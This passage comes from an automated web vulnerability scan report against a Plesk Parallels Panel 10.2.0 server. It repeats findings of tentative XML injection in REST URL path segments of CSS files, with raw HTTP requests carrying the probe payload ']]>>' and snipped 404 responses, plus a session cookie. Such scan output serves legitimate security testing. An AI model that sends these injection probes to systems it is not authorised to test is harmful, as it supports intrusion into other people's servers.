Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:06 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.124. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/apps-control.css [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/main/apps-control.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default]]>>/plesk/css/main/apps-control.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:08 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.125. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/apps-control.css [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/main/apps-control.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk]]>>/css/main/apps-control.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:10 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.126. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/apps-control.css [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/main/apps-control.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk/css]]>>/main/apps-control.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:12 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.127. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/apps-control.css [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/main/apps-control.css

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk/css/main]]>>/apps-control.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:14 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.128. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/apps-control.css [REST URL parameter 6]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/main/apps-control.css

Issue detail

The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk/css/main/apps-control.css]]>> HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:16 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.129. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/buttons.css [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/main/buttons.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins]]>>/default/plesk/css/main/buttons.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:09 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.130. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/buttons.css [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/main/buttons.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default]]>>/plesk/css/main/buttons.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:11 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.131. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/buttons.css [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/main/buttons.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk]]>>/css/main/buttons.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:13 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.132. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/buttons.css [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/main/buttons.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk/css]]>>/main/buttons.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:15 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.133. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/buttons.css [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/main/buttons.css

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk/css/main]]>>/buttons.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:17 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.134. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/buttons.css [REST URL parameter 6]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/main/buttons.css

Issue detail

The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk/css/main/buttons.css]]>> HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:19 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.135. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/custom.css [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/main/custom.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins]]>>/default/plesk/css/main/custom.css?2 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:22 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.136. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/custom.css [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/main/custom.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default]]>>/plesk/css/main/custom.css?2 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:24 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.137. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/custom.css [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/main/custom.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk]]>>/css/main/custom.css?2 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:26 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.138. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/custom.css [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/main/custom.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk/css]]>>/main/custom.css?2 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:27 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.139. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/custom.css [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/main/custom.css

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk/css/main]]>>/custom.css?2 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:29 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.140. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/custom.css [REST URL parameter 6]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/main/custom.css

Issue detail

The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk/css/main/custom.css]]>>?2 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:31 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
